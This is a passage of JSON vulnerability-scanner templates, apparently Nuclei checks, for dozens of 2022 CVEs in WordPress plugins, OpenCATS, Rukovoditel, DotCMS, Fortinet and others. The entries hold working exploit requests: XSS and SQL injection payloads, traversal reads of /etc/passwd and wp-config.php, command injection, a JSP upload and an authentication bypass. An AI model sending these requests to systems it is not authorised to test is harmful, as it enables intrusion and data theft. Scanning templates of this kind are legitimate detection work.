name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection","severity":"critical"},"requests":[{"raw":["POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"version","part":"body_2","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: 